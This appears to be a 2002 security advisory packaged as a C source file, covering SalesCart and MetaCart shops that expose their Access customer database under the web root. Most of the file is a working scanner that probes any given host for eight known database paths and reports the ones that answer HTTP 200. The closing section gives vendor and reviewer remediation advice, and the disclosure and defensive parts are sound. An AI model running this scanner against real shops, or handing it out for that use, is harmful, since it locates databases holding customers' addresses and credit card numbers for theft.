|
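/*
 * COMMAND
 *   salescart, metacart remote database access
 *
 * SYSTEMS AFFECTED
 *   SalesCart up to 24 June 2002 ?
 *
 * PROBLEM
 *   Thanks to Tacettin Karadeniz [tacettinkaradeniz @ yahoo.com] for the report:
 *
 *   On a business web site built with SalesCart, every customer record of that
 *   site is reachable from the Internet. The whole database is kept in the file
 *   shop.mdb inside the fpdb directory, and any user can fetch this file
 *   without any authentication. The database contains sensitive personal data:
 *   name, surname, address, e-mail, phone number, credit card number, company
 *   name, ... According to the report the credit card numbers in shop.mdb are
 *   stored in the "query" part of the file. Requesting the following URL
 *   returns the database used by the product:
 *
 *       http://xxxshop.com/fpdb/shop.mdb
 *
 *   Reviewer note: the check below only verifies that the file is served
 *   (HTTP 200 on a HEAD request); it deliberately does not download the
 *   database, so no customer data is pulled just to confirm the exposure.
 *   A 200 is not a proof on its own — a server configured with custom error
 *   pages that answer 200 may produce a false positive; confirm by looking at
 *   the Content-Type / Content-Length of the response before reporting.
 *
 * Exploit :
 * =========
 */

/* Find the customer records of a shopping site that uses SalesCart or MetaCart. */
/* tacettinkaradeniz@yahoo.com karadenizeregli@2002 */
/* I LoVe CiLeK :>
 * Note: I did not write this program from scratch; I only changed the
 * necessary parts to put it into the shape I wanted :> */

#define _POSIX_C_SOURCE 200112L   /* getaddrinfo(), gai_strerror(), close() under -std=c11 */

#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <signal.h>

/* Candidate locations of the SalesCart / MetaCart Access database under the web root. */
static const char *const db_paths[] = {
    "/fpdb/shop.mdb",
    "/shoponline/fpdb/shop.mdb",
    "/database/metacart.mdb",
    "/shopping/database/metacart.mdb",
    "/shop/database/metacart.mdb",
    "/metacart/database/metacart.mdb",
    "/mcartfree/database/metacart.mdb",
    "/ASP/cart/database/metacart.mdb",
};

enum {
    DB_PATH_COUNT = sizeof db_paths / sizeof db_paths[0],
    RESP_BUF = 1024,   /* enough for a status line plus the first headers */
    REQ_BUF = 512
};

/* Print the tool banner. */
static void print_banner(void)
{
    printf("\n\t _ ");
    printf("\n\t|_ ._ _ _ | o ");
    printf("\n\t|_ | (/_ (_| | | ");
    printf("\n\t _| ");
    printf("\n\t Salescart - Metacart (c) 2002 ");
}

/*
 * Open a TCP connection to port 80 of `host` (name or literal address).
 * Returns the connected socket, or -1 after printing the error.
 */
static int connect_http(const char *host)
{
    struct addrinfo hints = { .ai_family = AF_UNSPEC, .ai_socktype = SOCK_STREAM };
    struct addrinfo *res = NULL;
    int rc = getaddrinfo(host, "80", &hints, &res);
    if (rc != 0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(rc));
        return -1;
    }

    int fd = -1;
    for (struct addrinfo *ai = res; ai != NULL; ai = ai->ai_next) {
        fd = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
        if (fd < 0) {
            continue;
        }
        if (connect(fd, ai->ai_addr, ai->ai_addrlen) == 0) {
            break;          /* connected */
        }
        close(fd);
        fd = -1;
    }
    if (fd < 0) {
        perror("connect");
    }
    freeaddrinfo(res);
    return fd;
}

/* Send all `len` bytes of `buf`; returns 0, or -1 on a failed/short send. */
static int send_all(int fd, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t n = send(fd, buf, len, 0);
        if (n <= 0) {
            return -1;
        }
        buf += n;
        len -= (size_t)n;
    }
    return 0;
}

/*
 * Parse "HTTP/x.y NNN ..." and return NNN, or -1 when `resp` is not an HTTP
 * status line. The original matched the substring "200" anywhere in the first
 * 20 bytes, which also fires on e.g. a Content-Length of 200.
 */
static int parse_status(const char *resp)
{
    if (strncmp(resp, "HTTP/", 5) != 0) {
        return -1;
    }
    const char *code = strchr(resp, ' ');
    if (code == NULL) {
        return -1;
    }
    code++;
    if (!isdigit((unsigned char)code[0]) || !isdigit((unsigned char)code[1]) ||
        !isdigit((unsigned char)code[2])) {
        return -1;
    }
    return (code[0] - '0') * 100 + (code[1] - '0') * 10 + (code[2] - '0');
}

/*
 * Issue "HEAD <path>" to `host` and return the HTTP status code (or -1 on any
 * network error). The raw start of the response (at least the status line,
 * NUL-terminated) is left in `out`. HEAD rather than GET: we only want to know
 * whether the file is served, not to pull the customer database.
 */
static int http_head(const char *host, const char *path, char *out, size_t outsz)
{
    out[0] = '\0';
    int fd = connect_http(host);
    if (fd < 0) {
        return -1;
    }

    /* Host: header — most shops of this kind live on shared (name-based) hosting. */
    char req[REQ_BUF];
    int n = snprintf(req, sizeof req, "HEAD %s HTTP/1.0\r\nHost: %s\r\n\r\n", path, host);
    if (n < 0 || (size_t)n >= sizeof req) {
        fprintf(stderr, "request too long for %s\n", path);
        close(fd);
        return -1;
    }
    if (send_all(fd, req, (size_t)n) < 0) {
        perror("send");
        close(fd);
        return -1;
    }

    /* Read until the status line is complete or the buffer is full; the
     * original recv()'d into an unterminated 20-byte buffer and strstr()'d it. */
    size_t got = 0;
    while (got < outsz - 1) {
        ssize_t r = recv(fd, out + got, outsz - 1 - got, 0);
        if (r <= 0) {
            break;
        }
        got += (size_t)r;
        if (memchr(out, '\n', got) != NULL) {
            break;
        }
    }
    close(fd);
    out[got] = '\0';
    return parse_status(out);
}

/*
 * Usage: <prog> www.xxxshopxyz.com
 * Probes each known database path on port 80 and reports the ones that answer
 * HTTP 200. Exit status is 0 when at least one path was found, 1 otherwise.
 */
int main(int argc, char *argv[])
{
    if (argc < 2) {
        print_banner();
        printf("\nKullanImI : %s www.xxxshopxyz.com \n\n", argv[0]);
        return 1;
    }
    const char *host = argv[1];

    /* A peer that hangs up mid-send must not kill the scanner with SIGPIPE. */
    signal(SIGPIPE, SIG_IGN);

    char resp[RESP_BUF];
    print_banner();

    /* Fingerprint first: shows the server banner and whether port 80 answers at all. */
    if (http_head(host, "/", resp, sizeof resp) < 0) {
        fprintf(stderr, "\n%s: no HTTP response on port 80\n", host);
        return 1;
    }
    printf("\n%s", resp);

    printf("Tarama YapILIyor..\n\n");
    int found = 0;
    for (size_t i = 0; i < DB_PATH_COUNT; i++) {
        if (http_head(host, db_paths[i], resp, sizeof resp) == 200) {
            printf("%s :  Oleyyy.. Bulundu :)\n", db_paths[i]);
            found++;
        }
    }

    if (found) {
        printf("\n Tarama isLemi %s web sistesi icin bitti.\n", host);
    } else {
        printf("\n Uzgunum tarama sonucu bir veri bulunamamIstIr...\n\n");
    }
    return found ? 0 : 1;
}

/*
 * SOLUTION
 * ========
 * Update (28 June 2002)
 *
 * This security issue arises when SalesCart is improperly deployed using
 * Microsoft FrontPage and Microsoft IIS, and the Microsoft Internet
 * Information Server (IIS 4.0 / IIS 5.0) is incorrectly administered or
 * configured for the web site on which SalesCart runs. Specifically, the
 * /fpdb virtual directory must NOT have READ permission enabled. The setting
 * is fully configurable by the SalesCart merchant from FrontPage: open the
 * web site, right-click the /fpdb folder, select Properties and uncheck
 * "Allow Files to be Browsed". Because this is a matter of administering the
 * IIS web server and the FrontPage web site rather than of SalesCart itself,
 * it can only be corrected by the SalesCart merchant or by the Internet
 * Service Provider. See the vendor's knowledge base article for more
 * information:
 *
 *     http://support.salescart.com/kb/KB-details.asp?key=5077
 *
 * Reviewer caveats:
 *   - Removing READ on /fpdb stops the direct download, but the vendor's fix
 *     leaves the database — which, per the report, holds credit card numbers
 *     in clear — inside the web root, one mis-set checkbox away from exposure
 *     again. Moving the .mdb outside the document root, or denying the .mdb
 *     extension at the web-server level for the whole site, is the durable
 *     fix; verify afterwards with a HEAD request such as the one above.
 *   - Every merchant whose shop.mdb was reachable should treat the records,
 *     including the stored card numbers, as already disclosed and act
 *     accordingly (web-server access logs for /fpdb/shop.mdb show who fetched
 *     it, if logging was enabled).
 */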